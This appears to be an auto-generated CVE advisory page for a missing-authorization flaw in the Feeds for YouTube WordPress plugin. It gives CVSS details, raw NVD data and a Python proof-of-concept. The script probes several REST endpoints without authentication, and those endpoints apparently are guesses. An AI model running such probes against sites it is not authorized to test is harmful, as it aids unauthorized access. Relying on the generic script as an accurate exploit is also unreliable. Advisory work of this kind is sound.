Security Vulnerability Report
中文
CVE-2025-64635 CVSS 5.3 MEDIUM

CVE-2025-64635

Published: 2025-12-16 09:15:56
Last Modified: 2026-04-27 16:16:43

Description

Missing Authorization vulnerability in Syed Balkhi Feeds for YouTube feeds-for-youtube allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Feeds for YouTube: from n/a through <= 2.4.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Feeds for YouTube <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64635 PoC - Feeds for YouTube Missing Authorization # Target: WordPress site with Feeds for YouTube plugin <= 2.4.0 import requests import json import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64635 Missing Authorization in Feeds for YouTube plugin """ # Common WordPress REST API endpoints for the plugin endpoints = [ '/wp-json/feeds-for-youtube/v1/', '/wp-json/feeds-for-youtube/v1/channels', '/wp-json/feeds-for-youtube/v1/playlists', '/wp-json/feeds-for-youtube/v1/videos', '/wp-json/feeds-for-youtube/v1/settings' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64635 - Missing Authorization Check") print("-" * 50) vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) print(f"\n[?] Endpoint: {endpoint}") print(f" Status: {response.status_code}") # Check if we get a successful response without authentication if response.status_code == 200: try: data = response.json() if data: print(f" [!] VULNERABLE - Received data without authentication") print(f" Response: {json.dumps(data, indent=2)[:500]}") vulnerable = True except: print(f" [!] VULNERABLE - Endpoint accessible without auth") vulnerable = True except requests.RequestException as e: print(f" [x] Error: {e}") print("\n" + "=" * 50) if vulnerable: print("[!] Target is VULNERABLE to CVE-2025-64635") print("[!] Plugin lacks proper authorization checks on REST API") else: print("[-] Target appears NOT vulnerable") return vulnerable if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter target URL: ").strip() check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64635", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.863", "lastModified": "2026-04-27T16:16:43.017", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Syed Balkhi Feeds for YouTube feeds-for-youtube allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Feeds for YouTube: from n/a through <= 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/feeds-for-youtube/vulnerability/wordpress-feeds-for-youtube-plugin-2-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}